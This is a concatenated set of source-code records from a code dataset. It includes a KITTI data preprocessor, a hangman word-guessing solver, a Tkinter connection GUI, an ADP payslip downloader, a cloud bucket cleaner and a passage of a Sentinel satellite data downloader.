'annos' in info:\n annos = info['annos']\n # we need other objects to avoid collision when sample\n annos = kitti.remove_dontcare(annos)\n loc = annos[\"location\"]\n dims = annos[\"dimensions\"]\n rots = annos[\"rotation_y\"]\n gt_names = annos[\"name\"]\n # print(gt_names, len(loc))\n gt_boxes = np.concatenate(\n [loc, dims, rots[..., np.newaxis]], axis=1).astype(np.float32)\n # gt_boxes = box_np_ops.box_camera_to_lidar(gt_boxes, rect, Trv2c)\n difficulty = annos[\"difficulty\"]\n input_dict.update({\n 'gt_boxes': gt_boxes,\n 'gt_names': gt_names,\n 'difficulty': difficulty,\n })\n if 'group_ids' in annos:\n input_dict['group_ids'] = annos[\"group_ids\"]\n example = prep_func(input_dict=input_dict)\n example[\"image_idx\"] = image_idx\n example[\"image_shape\"] = input_dict[\"image_shape\"]\n if \"anchors_mask\" in example:\n example[\"anchors_mask\"] = example[\"anchors_mask\"].astype(np.uint8)\n return example\n\n","sub_path":"second.pytorch/second/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"476375734","text":"from nltk.corpus import words\nimport itertools\nimport operator\n\n\n\n# most_occuring_length = []\n# word_processing_order = []\n# word_list = []\n# choice = ()\n# letter_list = []\n#\n#\n#\n#\n#\n# # choice_list = []\n#\n# alpl = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n# 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n# '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '@', '#', '&']\n\n\n\n\n\n\n\n\n#The purpose of this program is to solve the Political Hangman game at politicalhangman.com\n#The program is only given the dynamic information shown to a user as they are playing the game. This algorythim attempts\n#to solve the game by solving the unkown words. It attempts to solve the words that have a length most commonly found in\n#in the english dictionary. Giving the highest chance that a letter choice will be found in that word. It then sorts the\n#remaining words of a that specific length and gueeses again the most common letter found in the remaining words. Repeating\n#this process allows the algorithem to sort possible words and continue it's most probable character guessing. Once a\n#word has been solved the next most common length of word is attempted to be solves using the same patter, but now using\n#the additional information of letters in that have been correctly guessed and characters remaining that can be guessed.\n\n#\n#\n# # tweet = \"I was proud to endorse BilldeBlasio tonight He is leading the city in a way that brings people together to make a better life for all\"\n# tweet = '_____ _____ __ ______________ _____ _______ _ _____ ____ _________ __ __ ____ ________ _ __ _____ _________ ___________ _____'\n# tweet = '_ __ ___ ____ ______'\n\n\n# def highest_prob_length_let(alpl, tweet):\nchoice = ()\nword_processing_order = []\n\n\ndef word_proc_order(tweet, word_processing_order):\n global word_list\n # global word_processing_order\n\n word_length_order = []\n word_length_list = []\n most_occuring_length = []\n # word_processing_order = []\n\n\n\n # Takes all words in english dictionary and orders the lengths of the words from most common to least - word_length_order\n word_list = words.words()\n # lowercases all words in word_list dictionary\n word_list = [word.lower() for word in word_list]\n length = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n length_dict = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0, 13: 0, 14: 0, 15: 0,\n 16: 0, 17: 0, 18: 0, 19: 0, 20: 0}\n\n for word in word_list:\n for num in length:\n if len(word) == num:\n length_dict[num] = length_dict[num] + 1\n\n else:\n pass\n\n for w in sorted(length_dict, key=length_dict.get, reverse=True):\n a = w, length_dict[w]\n most_occuring_length.append(a)\n word_length_order.append(w)\n\n print('Most occuring lengths of words in English Dict', most_occuring_length)\n\n # print(word_length_order) #--- Most common lengths of words in dict order\n\n # Writes to list the length of each word in tweet\n word_lengths = (list(map(len, tweet.split())))\n # print(word_lengths) #--- lengths of words in tweet\n\n\n\n # determines what length of word in tweet exists in word_length_order and returns the first same length as x\n for length in word_length_order:\n if length in word_lengths:\n if length not in word_processing_order:\n word_processing_order.append(length)\n # print('pass')\n\n print('Most occuring lengths of words in tweet', word_processing_order)\n\n\n # return word_processing_order\n\n\n# def highest_prob_length_let(tweet, alpl):\n\n\ndef first_choice(tweet,alpl):\n\n from ML_test1 import choice\n global choice\n\n\n # global choice\n # global alpl\n global word_processing_order\n global word_list\n\n\n #added for testing\n # global tweet\n\n most_occuring_length = []\n word_length_order = []\n word_length_list = []\n # word_processing_order = []\n # word_lengths = []\n # x = ()\n # choice = ()\n letter_list = []\n\n word_proc_order(tweet, word_processing_order)\n\n x = word_processing_order[0]\n print('Word Length to be processed', x)\n\n\n # print(word_lengths) #--- lengths of words in tweet\n # print(word_processing_order) #--- Processing Order for lengths of words in tweet\n\n # creates a list of words from the dictionary/word_list that have the same\n # length as the most common length of word from the tweet\n for word in word_list:\n if len(word) == x:\n word_length_list.append(word)\n else:\n pass\n\n for word in word_length_list:\n for char in word:\n letter_list.append(char)\n\n # print(choice)\n # The counter determines which letter is most common\n # in all of the possible words with the most common length\n from collections import Counter\n c = Counter(letter_list)\n first_letter_choice_tup = c.most_common(36)\n choice_list = []\n for j, k in first_letter_choice_tup:\n if j in alpl:\n choice_list.append(j)\n choice = choice_list[0]\n print('Most common letters in most common word length being processes', choice_list)\n print('Most common letter still in alpl choices', choice)\n # alpl.remove(choice)\n # print(word_processing_order)\n # print(word_length_order)\n\n\n ###added for testing\n # tweet = 'hypotaxia acrospire bip___ic'\n print('final',choice)\n\n return choice\n\ndef word_guessing(tweet,alpl):\n\n global word_processing_order\n global choice\n global wo\n\n if len(word_processing_order) == 0:\n\n word_proc_order(word_processing_order)\n\n # while True:\n print('top')\n comparing_words = []\n\n\n #gets all words from tweeet that equal the currently evaulated word length\n for word in tweet.split():\n if len(word) == word_processing_order[0]:\n comparing_words.append(word)\n\n possible_words = []\n\n o = []\n for l in comparing_words:\n for i in l:\n o.append(i)\n\n if \"_\" not in o:\n comparing_words = []\n del word_processing_order[0]\n for word in tweet.split():\n if len(word) == word_processing_order[0]:\n comparing_words.append(word)\n\n\n print('Word Length to be processed', word_processing_order[0])\n print('comparing words',comparing_words)\n print(\"word list length\", len(word_list))\n\n\n\n for l in comparing_words:\n print(l)\n let_list = []\n for char in l:\n let_list.append(char)\n for i in word_list:\n # print(i)\n u = list(i)\n # print(u)\n for n,t in enumerate(u):\n if t not in let_list:\n u[n] = '_'\n # print(u)\n if u == let_list:\n # print(i)\n possible_words.append(i)\n # if u == let_list:\n # new_idea.append(word)\n\n print(possible_words)\n\n if len(possible_words) == 0:\n print('HHHHHHHHH')\n del word_processing_order[0]\n word_guessing(tweet, alpl)\n return choice\n\n\n letter_list = []\n for word in possible_words:\n for char in word:\n letter_list.append(char)\n print('letter list', letter_list)\n\n\n #### Break possible words apart and return most common letter as the guess\n from collections import Counter\n c = Counter(letter_list)\n first_letter_choice_tup = c.most_common(36)\n choice_list = []\n for j, k in first_letter_choice_tup:\n if j in alpl:\n choice_list.append(j)\n # print(first_letter_choice_tup)\n # print(choice_list)\n\n print('choice list', choice_list)\n print(choice_list[0])\n choice = choice_list[0]\n print('Most common letters in most common word length being processes', choice_list)\n print('Most common letter still in alpl choices', choice)\n\n # print(first_letter_choice_tup)\n # print(choice)\n return choice\n\ndef highest_prob_length_let(tweet, alpl):\n\n #Innitiates the word_guess function after the initial letter guess is made successfully.\n # while True:\n for word in tweet.split():\n for char in word:\n if char != \"_\":\n word_guessing(tweet, alpl)\n return choice\n\n first_choice(tweet,alpl)\n\n # print('here',choice)\n return choice\n\n# highest_prob_length_let(tweet, alpl)\n# print(choice)\n\n\n\n","sub_path":"First_attemp_dict_sort.py","file_name":"First_attemp_dict_sort.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"537938955","text":"import tkinter as tk\nfrom tkinter import font as tkfont\nimport wifiInterface\nimport PIL.Image, PIL.ImageTk\n\nclass InterfaceApp(tk.Tk):\n\n def __init__(self):\n tk.Tk.__init__(self)\n\n #Tkinter configurations\n self.title_font = tkfont.Font(family='Consolas', size=15, weight=\"bold\")\n self.info_font = tkfont.Font(family='Consolas', size=10, weight=\"bold\")\n self.geometry(\"500x500\")\n self.title('InterfaceApp')\n\n #Wifiinterface\n self.wifiinterface = wifiInterface.wifiInterface()\n\n # the container is where we'll stack a bunch of frames\n # on top of each other, then the one we want visible\n # will be raised above the others\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n for allframes in (AccessPoints, ConnectPage, Connected):\n page_name = allframes.__name__\n frame = allframes(parent=container, controller=self)\n self.frames[page_name] = frame\n\n # put all of the pages in the same location;\n # the one on the top of the stacking order\n # will be the one that is visible.\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(\"ConnectPage\")\n\n\n #Function to show a given tkinter page referenced by name\n def show_frame(self, page_name):\n frame = self.frames[page_name]\n frame.tkraise()\n\nclass AccessPoints(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller=controller\n label = tk.Label(self, text=\"Select RUFUS' network to connect\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n label = tk.Label(self, text=\"Available Access points:\", font=controller.info_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n\n # List of AP's\n self.aplist = tk.Listbox(self, bg=\"#A0A0A0\", width=30)\n\n self.aplist.pack(side=\"top\")\n\n connectAPButton = tk.Button(self, text=\"Connect\",\n command=lambda: self.tryAP(controller))\n connectAPButton.pack(side=\"top\")\n\n refreshButton = tk.Button(self, text=\"Refresh\",\n command=lambda: self.refreshAPS(controller))\n refreshButton.pack(side=\"top\")\n\n def tryAP(self, controller):\n pass\n\n def refreshAPS(self, controller):\n\n\n self.aplist.insert(1, \"Not implemented yet\")\n\n controller.wifiinterface.getAPS()\n\n\n#Class to handle connection\nclass ConnectPage(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n label = tk.Label(self, text=\"Connect to RUFUS\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n label = tk.Label(self, text=\"Enter IP and port to connect:\", font=controller.info_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n\n backgroundColor = \"#c0c0c0\"\n self.configure(background=backgroundColor)\n\n #### entry stuff #####\n self.ip_v = tk.StringVar()\n self.port_v = tk.StringVar()\n\n IP_entry = tk.Entry(self, width=15, textvariable=self.ip_v)\n IP_entry.pack(side=\"top\")\n self.ip_v.set(\"192.168.5.174\")\n\n Port_entry = tk.Entry(self, width=10, textvariable=self.port_v)\n Port_entry.pack(side=\"top\")\n self.port_v.set(\"10000\")\n\n #### if button pressed, check for connection #####\n connectbutton = tk.Button(self, text=\"Connect\",\n command=lambda: controller.wifiinterface.CheckConnect(self.controller, self.ip_v, self.port_v))\n connectbutton.pack(side=\"bottom\")\n\n\n\n#Class to handle stream of data\nclass Connected(tk.Frame):\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n \t############# test med viktors kode ################\n \t# Create label (area for showing video)\n\t\tself.VideoFeedLabel = tk.Label(self)\n\t\tself.VideoFeedLabel.pack()\n \t\t# Add button Function\n\t\tdef disconnect(parent, controller):\n\t\t controller.wifiinterface.CloseConnection(controller)\n\n\t\t# Add Button\n\t\tdisconnect_button = tk.Button(self, text=\"Disconnect\", command=lambda: disconnect(parent,controller), bg=\"OrangeRed2\", fg=\"white\")\n\n\t\tdisconnect_button.place(rely=0,relx=1,anchor=tk.NE)\n\n\t\tself.distance_var = tk.StringVar()\n\t\tself.distance_var.set(\"XXXXXXX\")\n\n\t\tself.distance_label = tk.Label(self, textvariable=self.distance_var, font=(\"Helvetica\", 12))\n\t\tself.distance_label.place(rely=0,relx=0,anchor=tk.NW)\n\n\tdef display(self, frame_img):\n\n\t\tself.VideoFeedLabel.config(image=frame_img)\n\t\tself.VideoFeedLabel.image = frame_img\n","sub_path":"Controller/InterfaceApp.py","file_name":"InterfaceApp.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"245313939","text":"#!/usr/bin/env python3\nimport xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\nfrom urllib import parse\nimport requests\nimport getpass\nimport pdb\nimport sys\nimport os\nimport re\n\ncompany = input(\"Company Code: \")\nusername = input(\"Username: \")\npassword = getpass.getpass()\n\nprint(\"Starting request session\")\ns = requests.session()\n\nLOGIN_ENDPOINT = \"https://www.adpworld.de/ipclogin/5/loginform.fcc\"\nLOGIN_PARAMS = {\"COMPANY\": company, \"USER\": username, \"PASSWORD\": password, \"TARGET\": \"-SM-https%3a%2f%2fwww%2eadpworld%2ede%2findex%2ehtml\"}\n\nprint(\"Trying to login… \", end=\"\")\nreq = s.post(LOGIN_ENDPOINT, data=LOGIN_PARAMS)\nif \"JSESSIONID\" in s.cookies:\n print(\"success!\")\nelse:\n print(\"FAIL. Please check your credentials.\")\n sys.exit(1)\n\n# Now parse the landing page to find the URL to the ePayslip application\nsoup = BeautifulSoup(req.text, 'html.parser')\npayslip_param = list(filter(lambda x: \"ePayslip\" in x.text,soup.find_all(\"a\")))\npayslip_url = payslip_param[0].get(\"href\")\nurl = \"{}{}\".format(req.url, payslip_url)\n\n# Access the ePayslip app to read out a few parameters and the total amount of stored payslips\nreq = s.get(url)\nsoup = BeautifulSoup(req.text, 'html.parser')\npaginator_text = soup.find(\"table\").find(\"span\", {\"class\": \"ui-paginator-current\"}).text\ntotal_payslips = int(re.match(\".*?([0-9]*)$\", paginator_text).group(1))\n#links = list(filter(lambda x: \"DocDownload\" in x.get(\"href\"), soup.find_all(\"a\")))\nglobal epayslip_soup\nepayslip_soup = soup\n\nADP_BASE_URL = parse.urlunparse(parse.urlparse(req.url)._replace(path=\"\"))\n\ndef paginator_xhr(first=0, rows=20):\n global epayslip_soup\n metadata = list(epayslip_soup.find_all(\"input\"))\n target_elements = list(epayslip_soup.find(\"form\").find_all(\"div\"))\n magic_application_id = list(filter(lambda x: \"dataTable\" in x.get(\"class\"), target_elements))[0].get(\"id\")\n javax_faces_encodedURL = list(filter(lambda x: x.get(\"name\") == \"javax.faces.encodedURL\", metadata))[0].get(\"value\")\n javax_faces_ViewState = list(filter(lambda x: x.get(\"name\") == \"javax.faces.ViewState\", metadata))[0].get(\"value\")\n SUBMIT = list(filter(lambda x: \"SUBMIT\" in x.get(\"name\"), metadata))[0].get(\"name\")\n data = {\n \"javax.faces.partial.ajax\": True,\n \"javax.faces.source\": magic_application_id,\n \"javax.faces.partial.execute\": magic_application_id,\n \"javax.faces.partial.render\": magic_application_id,\n magic_application_id: magic_application_id,\n magic_application_id + \"_pagination\": True,\n magic_application_id + \"_first\": first,\n magic_application_id + \"_rows\": rows,\n magic_application_id + \"_encodeFeature\": True,\n \"javax.faces.encodedURL\": javax_faces_encodedURL,\n SUBMIT: \"1\"\n }\n xhr_link = parse.urljoin(ADP_BASE_URL, javax_faces_encodedURL)\n req = s.post(xhr_link, data=data, headers={\"Faces-Request\": \"partion/ajax\"})\n root = ET.fromstring(req.text)\n changes = list(list(root)[0])\n soup = BeautifulSoup(changes[0].text, \"html.parser\")\n all_a = list(soup.find_all(\"a\"))\n all_page_links = list(map(lambda x: parse.urljoin(ADP_BASE_URL, x.get(\"href\")), all_a))\n new_ViewState = changes[1].text\n return all_page_links\n\ndef download_payslip(url):\n #print(\"Downloading {}\".format(url))\n req = s.get(url)\n if (req.headers.get(\"Content-Type\") != \"application/pdf\"):\n print(\"{} is not a PDF, skipping download. Please check manually\".format(url))\n return\n cd_header = req.headers.get(\"Content-Disposition\")\n pdf_filename = cd_header.split(\"\\\"\")[1]\n assert not \"/\" in pdf_filename\n if os.path.isfile(\"downloads/\" + pdf_filename):\n print(\"{} already exists, skipping download…\".format(pdf_filename))\n else:\n print(\"Downloading {}… \".format(pdf_filename), end=\"\")\n with open(\"downloads/\" + pdf_filename, \"wb\") as fp:\n fp.write(req.content)\n\nprint(\"Collecting all payslip URLs via XHR. We expect {} in total.\".format(total_payslips))\nlinks = []\nwhile len(links) < total_payslips:\n print(\"Fetching page 1. Payslip {}-{}… \".format(len(links), len(links)+99), end=\"\")\n new_links = paginator_xhr(len(links), 99)\n links +=new_links\n print(\"Done.\")\nprint(\"Successfuly fetched all payslip download URLs. Now downloading…\")\n\nfor link in links:\n download_payslip(link)\nprint(\"All downloads succeeded. Done, exiting.\")\n","sub_path":"adp_downloader.py","file_name":"adp_downloader.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"196041001","text":"#\n# (C) Copyright IBM Corp. 2018\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom pywren_ibm_cloud.storage import storage\nimport logging\nimport sys\nimport os\n\nlogger = logging.getLogger(__name__)\n\ndef clean_bucket(bucket, prefix, storage_config):\n storage_handler = storage.Storage(storage_config)\n sys.stdout = open(os.devnull, 'w')\n clean_os_bucket(bucket, prefix, storage_handler)\n sys.stdout = sys.__stdout__\n\ndef clean_os_bucket(bucket, prefix, storage_handler):\n logger.info(\"Going to delete all objects from bucket '{}' and prefix '{}'\".format(bucket, prefix))\n total_objects = 0\n objects_to_delete = storage_handler.list_objects(bucket, prefix)\n \n while objects_to_delete:\n if 'Key' in objects_to_delete[0]:\n # S3 API\n delete_keys = [obj['Key'] for obj in objects_to_delete]\n elif 'name' in objects_to_delete[0]:\n # Swift API\n delete_keys = [obj['name'] for obj in objects_to_delete]\n logger.debug('{} objects found'.format(len(delete_keys)))\n total_objects = total_objects + len(delete_keys)\n storage_handler.delete_objects(bucket, delete_keys)\n objects_to_delete = storage_handler.list_objects(bucket, prefix)\n logger.info('Finished deleting objects, total found: {}'.format(total_objects))\n","sub_path":"pywren/pywren_ibm_cloud/storage/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"445539347","text":"'''\n Purpose: Universal downloader for Sentinel data\n Version: v1.0 10/2018\n Author: Ben Loveday, Plymouth Marine Laboratory\n Notes: This code is offered with no warranty and under the MIT licence.\n \n To come in future versions:\n - add filtering of downloads by regional flag coverage\n - initialise with config file (not arguments)\n \n Usage:\n /opt/local/bin/python3.6 Universal_Sentinel_Downloader.py -p -n -i 50.0,-10.0:51.0,-9.0 -l Sentinel-3 -x OL_2_WFR* -f NOW-10 -u 'https://coda.eumetsat.int'\n\n'''\n\nimport logging\nimport re\nimport requests\nfrom lxml import etree\nimport os\nfrom datetime import datetime, timedelta\nfrom glob import glob\nimport tempfile\nimport optparse\nimport sys, os, shutil\nimport numpy as np\n\n# ------------------------------------------------------------------------------\ndef Define_request(par,url_hub):\n # Define search request and set par['hub']\n url_str = url_hub + '/search?q='\n \n for key in par['req'].keys():\n if url_str[-3:]!='?q=': url_str += ' AND '\n url_str += '%s:%s'%(key,par['req'][key])\n \n url_str += '&rows=%i&start=0'%par['max_rows']\n par['hub']=url_hub\n\n return url_str,par\n\n# ------------------------------------------------------------------------------\ndef parse_xml(xml_text):\n # this line is python version dependant!!\n if sys.version_info[0] == 3:\n xml_str = re.sub(b' xmlns=\"[^\"]+\"', b'', xml_text, count=1)\n else:\n xml_str = re.sub(' xmlns=\"[^\"]+\"', '', xml_text, count=1)\n\n root = etree.fromstring(xml_str)\n entry_list = root.xpath(\"//entry\")\n \n res = []\n for ee in entry_list:\n dt = {\n 'uuid': ee.xpath(\"str[@name='uuid']/text()\")[0],\n 'identifier': ee.xpath(\"str[@name='identifier']/text()\")[0],\n 'beginposition': ee.xpath(\"date[@name='beginposition']/text()\")[0],\n 'endposition': ee.xpath(\"date[@name='endposition']/text()\")[0],\n }\n res.append(dt)\n \n return res\n\n# ------------------------------------------------------------------------------\ndef process_request(par,logging): \n\n # open requests session\n with requests.Session() as req_ses:\n\n # define transport adaptor\n adaptor = requests.adapters.HTTPAdapter(max_retries=par['Retries'])\n \n # define URL\n url_str,par = Define_request(par,par['url'])\n\n # ------------------------------------------------------------------------\n # Request available files\n logging.info(\"Processing request at specified data HUB ... \")\n\n # try to connect to primary hub first:\n req_ses.mount(par['hub'], adaptor)\n logging.info('Querying data at: ' + par['hub'])\n logging.info('Query: ' + url_str)\n r = req_ses.get(url_str, auth=(par['user'],par['pass']), timeout=par['Timeout'])\n logging.info('Code '+par['url']+': ' + str(r.status_code))\n\n if r.status_code != 200:\n req_ses.close()\n logging.error(\"Data query to \"+par['hub']+\" was not successful! (\"+str(par['Retries'])+\" retries)\")\n\n logging.info(\"Done\")\n if r.status_code == 200:\n # parse xml code: extract image names and UUID\n entries = parse_xml(r.content)\n if len(entries)>=par['max_rows']:\n logging.error(\"The number of scenes (\"+str(len(entries))+\") is greater than maximum (\"+str(par['max_rows'])+\"): increase max_rows!\")\n req_ses.close()\n raise Exception(\"The number of scenes (\"+str(len(entries))+\") is greater than maximum (\"+str(par['max_rows'])+\"): increase max_rows!\")\n else:\n entries = False\n\n return entries\n\n# ------------------------------------------------------------------------------\ndef download_files(par,entries,logging):\n # open requests session\n with requests.Session() as req_ses:\n\n # ----------------------------------------------------------------------\n # Create temp_dir\n temp_dir = tempfile.mkdtemp(suffix='_esa_downloader')\n # ----------------------------------------------------------------------\n # download files\n logging.info(\"Started downloading %i files ...\"%len(entries))\n for ee in entries:\n split_id = ee['identifier'].split('_')\n sensor = split_id[0][:2]\n\n # check if the file already exists in the archive\n try:\n if sensor.lower()=='s1':\n dtime = datetime.strptime(split_id[5], '%Y%m%dT%H%M%S')\n elif sensor.lower()=='s2':\n # annoying date format change\n try:\n logging.info('Trying for old date format')\n dtime = datetime.strptime(split_id[5], '%Y%m%dT%H%M%S')\n except:\n logging.info('Failed: Trying for new date format')\n dtime = datetime.strptime(split_id[6], '%Y%m%dT%H%M%S')\n elif sensor.lower()=='s3':\n dtime = datetime.strptime(ee['identifier'][16:31], '%Y%m%dT%H%M%S')\n else:\n logging.error(\"Not a Sentinel file name!\")\n raise Exception(\"Not a Sentinel file name!\")\n except:\n logging.warning('Unknown file format...skipping this url: '+ee['identifier'])\n continue\n\n if par['make_sub_dir']:\n arc_dir = os.path.join(par['root_dir'],dtime.strftime('%Y/%m/%d'))\n else:\n arc_dir = par['root_dir']\n \n fname = os.path.join(arc_dir,ee['identifier']+'*')\n fnames = glob(fname)\n\n # build url string & isolate file\n url_str = par['hub'] + \"/odata/v1/Products('%s')/$value\"%ee['uuid']\n try:\n r = req_ses.get(url_str, auth=(par['user'], par['pass']), stream=True)\n except:\n logging.warning('Hub misbehaving, skipping this url')\n logging.info('>>> '+url_str)\n continue\n\n # check file size\n file_size=-1\n try:\n base_fname = r.headers['content-disposition'].split('=')[1].strip('\"')\n file_size = int(r.headers['content-range'].split('/')[1])\n except:\n logging.info('Hub misbehaving, skipping this url')\n logging.info('>>> '+url_str)\n continue\n\n # download file to temp dir\n temp_fname = os.path.join(temp_dir,base_fname)\n logging.info(\"Downloading %s ... \"%base_fname)\n\n chunk_count = 0.\n chunk_size = 1024\n iters=np.arange(0,110,10)\n niter=0\n with open(temp_fname, 'wb') as f:\n for chunk in r.iter_content(chunk_size=chunk_size):\n chunk_count = chunk_count + chunk_size\n if chunk: # filter out keep-alive new chunks\n percent_done = float(chunk_count)/float(file_size)*100.\n if percent_done >= iters[niter]:\n logging.info(str(int(percent_done))+'% complete')\n logging.info(str(float(chunk_count/(1024.*1024.)))+' Mb downloaded')\n niter = niter+1\n f.write(chunk)\n f.flush()\n\n # get file timestamp\n timestamp = os.stat(temp_fname).st_mtime\n \n # copy from temp to archive\n if not os.path.exists(arc_dir):\n os.makedirs(arc_dir)\n\n try:\n shutil.move(temp_fname,arc_dir)\n except:\n #remnant of old file:\n os.remove(arc_dir+'/'+os.path.basename(temp_fname))\n shutil.move(temp_fname,arc_dir)\n\n # delete temp_dir\n shutil.rmtree(temp_dir)\n logging.info(\"Finished downloading!\")\n\n return\n\n# ------------------------------------------------------------------------------\ndef default_param():\n par = {\n 'Retries': 1,\n 'Timeout': None,\n 'url':'https://coda.eumetsat.int/',\n 'hub':None, # eventual hub used to download: one of the urls above.\n 'max_rows': 99 # maximum number of rows to request, increase if need more: but hub limits at 100 (as of 28/10/2016)!\n }\n \n par['req'] = {}\n\n return par\n\n# ------------------------------------------------------------------------------\ndef parse_date(date_str,midnight=False): \n if date_str!='':\n if date_str[:3].upper()=='NOW':\n if len(date_str)==3:\n dt = datetime.now()\n elif date_str[3]=='-':\n dt = datetime.now() - timedelta(days=int(options.date_from[4:]))\n else:\n raise Exception(\"Incorrect date!\")\n else:\n if len(date_str)==8:\n dt = datetime.strptime(date_str, '%Y%m%d')\n if midnight: dt += timedelta(hours=23,minutes=59,seconds=59.999)\n else:\n dt = datetime.strptime(date_str, '%Y%m%dT%H%M%S')\n else:\n raise Exception(\"Date not set!\")\n\n return dt\n\n# ------------------------------------------------------------------------------ \ndef parse_options(options): \n # check options\n if options.footprint == '':\n raise Exception(\"no footprint selected, use --fprint option\")\n\n if options.date_from=='' and options.date_to!='': options.date_from=options.date_to\n if options.date_to=='' and options.date_from!='': options.date_to=options.date_from\n\n if options.date_from=='' and options.date_to!='': options.date_from=options.date_to\n\n # set parameters\n par = default_param()\n \n if options.sensor_operational_mode!='': par['req']['sensoroperationalmode'] = options.sensor_operational_mode\n if options.product_type!='': par['req']['producttype'] = options.product_type\n if options.platform_name!='': par['req']['platformname'] = options.platform_name\n if options.polarisation_mode!='': par['req']['polarisationmode'] = options.polarisation_mode\n if options.relative_orbit!='': par['req']['relativeorbitnumber'] = options.relative_orbit\n if options.absolute_orbit!='': par['req']['orbitnumber'] = options.absolute_orbit\n if options.logfile!='': par['logfile'] = options.logfile\n\n if options.user!='':\n par['user'] = options.user\n else:\n raise Exception(\"no username provided, use --user option\")\n\n if options.password!='':\n par['pass'] = options.password\n else:\n raise Exception(\"no username provided, use --pass option\")\n \n if options.url!='': par['url'] = options.url\n\n if options.logfile!='': par['logfile'] = options.logfile\n\n if options.root_dir!='': par['root_dir'] = options.root_dir\n par['make_sub_dir'] = options.make_sub_dir\n\n if options.footprint!='':\n latlon = options.footprint.strip().split(':')\n \n latlon1 = latlon[0].strip().split(',')\n latlon2 = latlon[1].strip().split(',')\n \n lat1 = latlon1[0].strip()\n lon1 = latlon1[1].strip()\n\n lat2 = latlon2[0].strip()\n lon2 = latlon2[1].strip()\n\n par['req']['footprint'] = '\"Intersects(POLYGON((%(lon1)s %(lat1)s,%(lon2)s %(lat1)s,%(lon2)s %(lat2)s,%(lon1)s %(lat2)s,%(lon1)s %(lat1)s)))\"'%{'lon1':lon1,'lat1':lat1,'lon2':lon2,'lat2':lat2}\n\n # date-time\n if options.date_from!='':\n dt_from = parse_date(options.date_from)\n dt_to = parse_date(options.date_to,midnight=True)\n \n par['req']['beginPosition'] = '['+dt_from.strftime('%Y-%m-%dT%H:%M:%S')+dt_from.strftime('.%f')[:4]+'Z TO '+dt_to.strftime('%Y-%m-%dT%H:%M:%S')+dt_to.strftime('.%f')[:4]+'Z]'\n\n return par\n\n# ======================================================================\n# Simple search query: https://scihub.copernicus.eu/twiki/do/view/SciHubUserGuide/3FullTextSearch\n\n# Parsing command line\nif __name__==\"__main__\":\n\n # Parse command line\n command_line_parser = optparse.OptionParser()\n\n command_line_parser.add_option(\"--date_from\", \"-f\", dest=\"date_from\", default = 'NOW-1',\n help=\"Request from date: YYYYMMDD, YYYYMMDDTHHMMSS, NOW, NOW-xdays\")\n\n command_line_parser.add_option(\"--date_to\", \"-t\", dest=\"date_to\", default = 'NOW',\n help=\"Request to date: YYYYMMDD (will be the end of day), YYYYMMDDTHHMMSS, NOW, NOW-xdays\")\n\n command_line_parser.add_option(\"--dir\",\"-d\", dest=\"root_dir\", default = './',\n help=\"Main directory of archive (root_dir/yyyy/mm/dd/*)\")\n\n command_line_parser.add_option(\"--make_subdir\",\"-s\", dest=\"make_sub_dir\", action=\"store_true\",\n help=\"Add subdirectory (../yyyy/mm/dd/*)\",\n default=False)\n\n command_line_parser.add_option(\"--plat\",\"-l\", dest=\"platform_name\", default = 'Sentinel-3',\n help=\"Platform name: Sentinel-1, Sentinel-2, Sentinel-3\")\n\n command_line_parser.add_option(\"--prod\",\"-x\", dest=\"product_type\", default = 'OL_2_WFR*',\n help=\"Product type: OL_2_WFR*, OL_1_EFR*, SL_1_RBT*, SL_2_WST*, SLC, GRD, OCN etc\")\n\n command_line_parser.add_option(\"--mode\",\"-m\", dest=\"sensor_operational_mode\", default = '',\n help=\"Sensor operational mode: SM,IW,EW,WV \")\n\n command_line_parser.add_option(\"--pol\",\"-o\", dest=\"polarisation_mode\", default = '',\n help=\"Sensor polarisation mode: HH,VV,HV,VH \")\n\n command_line_parser.add_option(\"--relorb\",\"-r\", dest=\"relative_orbit\", default = '',\n help=\"Relative orbit number: NN, 'NN_0 TO NN_1' \")\n\n command_line_parser.add_option(\"--absorb\",\"-b\", dest=\"absolute_orbit\", default = '',\n help=\"Absolute orbit number: NN, 'NN_0 TO 